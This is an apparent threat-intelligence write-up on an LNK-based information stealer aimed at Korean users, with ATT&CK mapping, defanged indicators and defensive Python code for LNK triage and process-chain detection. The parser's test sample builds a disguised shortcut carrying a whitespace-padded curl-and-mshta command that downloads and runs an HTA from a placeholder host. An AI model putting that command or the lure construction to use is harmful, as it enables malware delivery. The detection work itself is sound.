Full Report
AhnLab SEcurity intelligence Center (ASEC) recently discovered a malicious LNK file being distributed to Korean users for the purpose of stealing user information. This type of malware collects various valuable data for threat actors, such as data related to virtual assets, browsers, public certificates, and email files, and it also performs keylogging. The confirmed malicious […]
Analysis Summary
# Tool/Technique: Malicious LNK File Information Stealer Chain
## Overview
A multi-stage attack initiated by a malicious LNK file disguised as a document the recipient would expect to receive (e.g., "Local Tax Bill.pdf.lnk"). The primary goal is information theft: system and user data, virtual asset (cryptocurrency wallet) files, browser credentials, and GPKI/NPKI certificates, with keylogging and clipboard capture running alongside the collection routines.
## Technical Details
- Type: Malware Chain (LNK leading to HTA, PowerShell, and VBScript)
- Platform: Windows
- Capabilities: Information stealing, keylogging, persistence establishment, data exfiltration.
- First Seen: April 22, 2025 (based on report date)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access (the source does not state the delivery channel; the lure filenames indicate a document-themed phishing delivery)
- TA0002 - Execution
- T1204.002 - User Execution: Malicious File (the disguised LNK)
- T1218.005 - System Binary Proxy Execution: Mshta (HTA staged to `%temp%`)
- T1059.001 - Command and Scripting Interpreter: PowerShell (`1.log`, `2.log`, `1.ps1`)
- T1059.005 - Command and Scripting Interpreter: Visual Basic (`1.vbs`)
- TA0003 - Persistence
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Base64-encoded PowerShell)
- T1140 - Deobfuscate/Decode Files or Information (scripts decode their own Base64 payloads)
- T1036.007 - Masquerading: Double File Extension (`.pdf.lnk`)
- T1036.008 - Masquerading: Masquerade File Type (PowerShell scripts carried as `1.log`, `2.log`)
- TA0006 - Credential Access
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers (DPAPI-protected browser data)
- T1649 - Steal or Forge Authentication Certificates (GPKI/NPKI certificate theft)
- T1056.001 - Input Capture: Keylogging
- TA0007 - Discovery
- T1082 - System Information Discovery
- T1083 - File and Directory Discovery (wallet file name patterns, recent files, shortcut targets)
- TA0009 - Collection
- T1005 - Data from Local System
- T1115 - Clipboard Data
- T1560 - Archive Collected Data (collected data is compressed before upload)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (HTTPS to the staging and C2 hosts)
- T1105 - Ingress Tool Transfer (HTA download; `Work` function can fetch further files)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (`UploadFile`)
## Functionality
### Core Capabilities
The attack chain involves a specific sequence:
1. **Initial Execution:** User executes a disguised LNK file (e.g., `Local Tax Bill.pdf.lnk`).
2. **Staging:** The LNK downloads and executes an HTA file from the attacker server into the `%temp%` folder.
3. **Payload Delivery:** The HTA file carries an embedded, compressed ZIP archive that it drops and extracts. The archive contains bait documents (PDFs) shown to the victim and the malicious scripts `1.log`, `2.log`, `1.ps1` (all PowerShell, the first two carrying a `.log` extension to look like harmless text files) and `1.vbs`.
4. **Information Collection (`1.log` PowerShell):** Collects system information, browser data (Edge, Chrome, Naver Whale, Firefox), cryptocurrency wallet data, and public/government certificates (GPKI, NPKI). It also gathers recently accessed files and shortcut targets.
5. **Keylogging (`2.log` PowerShell):** Captures keystrokes and clipboard data.
6. **Persistence:** Establishes persistence via Run Key registration.
7. **Exfiltration:** Compresses collected data and uploads it to the attacker server using the `UploadFile` function.
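The chain above starts with the LNK, so the first triage question is what the shortcut actually launches. The following parser is an added example written for this summary (it is not ASEC's tooling and not code from the report): it walks the MS-SHLLINK structures far enough to recover the StringData fields (relative path, arguments, icon) and the ShowCommand, then applies the heuristics that would have flagged this lure. The sample LNK is constructed in-code to resemble the described chain; its command line, the `example.invalid` URL and the icon path are assumptions, not the real file's contents.

```python
import re
import struct

# LinkFlags bits from MS-SHLLINK 2.1.1 (only the ones this triage needs).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in exactly this order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # window starts minimised: the usual way a lure hides its console
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "cmd", "wscript", "cscript", "rundll32",
                "regsvr32", "certutil", "curl", "bitsadmin")


def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader + StringData; IDList and LinkInfo are skipped by declared size."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # character count, no terminator
        off += 2
        if flags & IS_UNICODE:
            info[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return info


def triage_lnk(data: bytes, filename: str) -> list:
    """Heuristics for document-lookalike LNK lures; returns human-readable findings."""
    info = parse_lnk(data)
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if re.search(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", filename, re.I):
        findings.append("double extension: " + filename)
    hosts = [h for h in SCRIPT_HOSTS if h in target]
    if hosts:
        findings.append("target invokes script host(s): " + ", ".join(hosts))
    if "http" in target or "%temp%" in target or "\\temp\\" in target:
        findings.append("target references a URL or temp directory")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden (ShowCommand=7)")
    if re.search(r"\s{32,}", info.get("arguments", "")):
        findings.append("arguments padded with whitespace (hides the command in Properties)")
    icon = info.get("icon_location", "").lower()
    if hosts and (".pdf" in icon or "acro" in icon):
        findings.append("PDF-style icon on a script-host target")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 1) -> bytes:
    """Serialise a minimal Unicode .lnk carrying only StringData (enough for parse_lnk)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION
    hdr = bytearray(76)
    struct.pack_into("<I", hdr, 0, 0x4C)
    hdr[4:20] = LNK_CLSID
    struct.pack_into("<I", hdr, 20, flags)
    struct.pack_into("<I", hdr, 60, show_command)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return bytes(hdr) + body + struct.pack("<I", 0)   # TerminalBlock ends ExtraData


def constructed_sample() -> bytes:
    """Constructed lookalike of the lure in the report; command line and paths are assumed."""
    args = " " * 40 + "/c curl -s https://example.invalid/x.hta -o %temp%\\x.hta & mshta %temp%\\x.hta"
    return build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe", args,
                     "C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe", SW_SHOWMINNOACTIVE)


if __name__ == "__main__":
    for line in triage_lnk(constructed_sample(), "Local Tax Bill.pdf.lnk"):
        print("[!]", line)
```

Run it on a real sample by reading the file bytes instead of `constructed_sample()`; the parser deliberately does not follow the IDList, so a lure whose target is expressed only through shell item IDs will show an empty `relative_path` and must be judged on `arguments` alone.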
### Advanced Features
- **DPAPI Decryption:** Decrypts DPAPI-protected browser data (saved credentials and similar stores) using the victim's own DPAPI keys. Because the scripts run in the logged-on user's context, this needs no privilege escalation; DPAPI only protects the data against other accounts, not against code running as the user.
- **Targeted Certificate Theft:** Specifically targets data tied to Korean users: Naver Whale browser stores and GPKI (government) / NPKI (national public) certificates, which are used to authenticate to Korean government, banking and other online services and are therefore directly usable for account takeover.
- **File Targeting:** Specific file name patterns related to cryptocurrency wallets (`wallet`, `keystore`, `privatekey`, `metamask`, etc.) are targeted for collection.
- **Command and Control:** Incorporates a `Work` function to periodically communicate with the C2 server to receive further instructions (download/upload files, run commands).
## Indicators of Compromise
- File Hashes:
- MD5: `1b90eff0b4f54da72b19195489c3af6c`, `1d64508b384e928046887dd9cb32c2ac`, `af576449b207c0f84501863351d3b1fa`
- File Names:
- LNK: `Local Tax Bill.pdf.lnk`, `Public Disclosure of Sex Offender Information.pdf.lnk`
- Embedded Payload: `1.log` (PowerShell), `2.log` (PowerShell), `1.ps1`, `1.vbs`
- Registry Keys: a value under the user Run key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, the standard T1547.001 location); the exact value name and data are not given in the source.
- Network Indicators:
- Distribution URL: `hxxps://nid-naveroup[.]servepics[.]com/docs/revenue[.]zip`
- Download URLs: `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/prevenue[.]hta`, `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw[.]hta`, `hxxps://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/wsoj[.]hta`, `hxxps://nid-naveroup[.]servepics[.]com/docs/revenue[.]zip`
- Behavioral Indicators: Execution chain starting from LNK, HTA execution in temp folder, PowerShell scripts utilizing Base64 decoding, persistence established via Run keys, large data uploads following collection routines.
## Associated Threat Actors
- Not explicitly named, but the heavy focus on Korean-specific targets (Naver Whale browser, GPKI/NPKI certificates, Korean language comments in scripts) strongly suggests a threat group targeting South Korean entities or individuals.
## Detection Methods
- Signature-based detection: IoCs (hashes, URLs).
- Behavioral detection: process-tree monitoring for `explorer.exe` launching a script host from a `.lnk`, `mshta.exe` executing an `.hta` from a temp directory, `powershell.exe` descending from `mshta.exe` and running Base64-encoded commands or a `.log` file as a script, script hosts reading browser profile stores (`Login Data`, `Local State`, NPKI/GPKI directories), and a sudden large outbound upload shortly after the collection routines finish.
- YARA rules: the function names reported in the scripts (`Unprotect-Data`, `GetExWFile`, `RegisterTask`) only appear as plain text once the Base64 layer is removed. A rule that matches the on-disk `1.log`/`2.log` must therefore either target the Base64 form (YARA's `base64` string modifier generates all three encoding alignments) or be applied to the decoded content, e.g. via PowerShell script block logs (Event ID 4104), which record the decoded script.
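The behavioral chain and the encoded-PowerShell check can be expressed as a small correlation over process-creation events. The code below is an added example for this summary, not ASEC's detection logic: it takes Sysmon/4688-style records (pid, parent pid, image, command line), decodes `-EncodedCommand` payloads, looks for the function names the report lists, and walks the parent chain to catch PowerShell spawned under `mshta.exe`. The events are constructed inline and labelled as such; the decoded script body is an assumed stand-in, not the real `1.log`.

```python
import base64
import re

# Function names the report gives for the decoded 1.log / 2.log scripts, plus the
# self-decoding primitive the Base64 layer relies on.
SCRIPT_MARKERS = ("Unprotect-Data", "GetExWFile", "RegisterTask", "UploadFile", "FromBase64String")
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n|nc|ncoded|ncodedc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """What powershell.exe -EncodedCommand expects: Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="ignore")
    except ValueError:
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: dict, pid: int) -> list:
    """Image basenames from the nearest parent outward, bounded by the events we have."""
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        chain.append(basename(ev["image"]))
    return chain


def detect(events: list) -> list:
    """Return (pid, rule) pairs for events matching the LNK -> HTA -> PowerShell chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        low = cmd.lower()
        if img == "mshta.exe" and ".hta" in low and any(t in low for t in TEMP_DIRS):
            alerts.append((e["pid"], "mshta_hta_from_temp"))
        if img in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded:
                hits = [m for m in SCRIPT_MARKERS if m.lower() in decoded.lower()]
                if hits:
                    alerts.append((e["pid"], "encoded_ps_stealer_markers:" + ",".join(hits)))
            if "mshta.exe" in ancestors(by_pid, e["pid"]):
                alerts.append((e["pid"], "powershell_descends_from_mshta"))
    return alerts


def constructed_events() -> list:
    """Constructed process-creation records mimicking the chain; not real telemetry."""
    script = ("function Unprotect-Data { param($b) "
              "[Security.Cryptography.ProtectedData]::Unprotect($b,$null,'CurrentUser') }; "
              "UploadFile $zip")          # assumed stand-in for the decoded 1.log body
    temp = "C:\\Users\\victim\\AppData\\Local\\Temp"
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return [
        {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
        # cmd.exe launched by the .lnk (the shortcut's target)
        {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
         "cmdline": "cmd.exe /c ..."},
        {"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\mshta.exe",
         "cmdline": 'mshta.exe "' + temp + '\\prevenue.hta"'},
        {"pid": 400, "ppid": 300, "image": ps,
         "cmdline": "powershell.exe -w hidden -enc " + encode_command(script)},
        # benign admin use: must not alert (-ExecutionPolicy is not -EncodedCommand)
        {"pid": 500, "ppid": 100, "image": ps,
         "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    ]


if __name__ == "__main__":
    for pid, rule in detect(constructed_events()):
        print(pid, rule)
```

The ancestry walk is bounded by the events in hand, so feed it a window that includes the parent `mshta.exe` record; on a real EDR pipeline the same logic maps directly onto Sysmon Event ID 1 fields (`ProcessId`, `ParentProcessId`, `Image`, `CommandLine`).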
## Mitigation Strategies
- **User Education:** Training users to recognize and avoid executing suspicious LNK files, especially those disguised as official documents.
- **Application Control:** Block `mshta.exe` for standard users with AppLocker or WDAC, and constrain PowerShell (Constrained Language Mode, script block and module logging, execution restricted to signed scripts); deny script hosts launching content from `%temp%` and other user-writable directories.
- **Network Monitoring:** Block or alert on the listed distribution and C2 locations. Note that `servepics[.]com` is a dynamic-DNS domain and `cdn[.]glitch[.]global` is a legitimate public hosting CDN, so alert on the specific project paths listed above rather than blocking the whole host where that would disrupt legitimate use.
- **Endpoint Hardening:** Do not rely on browser password stores protected only by user DPAPI, since any code running as the user can decrypt them; prefer an enterprise password manager or hardware-backed credential storage, and keep GPKI/NPKI private keys on hardware tokens where the issuing service supports it.
- **Certificate Management:** Monitor for unusual attempts to export or utilize system or user certificates (GPKI/NPKI).
## Related Tools/Techniques
- General LNK phishing vectors.
- Credential stealers that decrypt Chromium- and Firefox-based credential stores through `CryptUnprotectData`, the same user-context DPAPI primitive exercised by tools such as Mimikatz's `dpapi` module.
- PowerShell information stealers utilizing file system enumeration and obfuscation.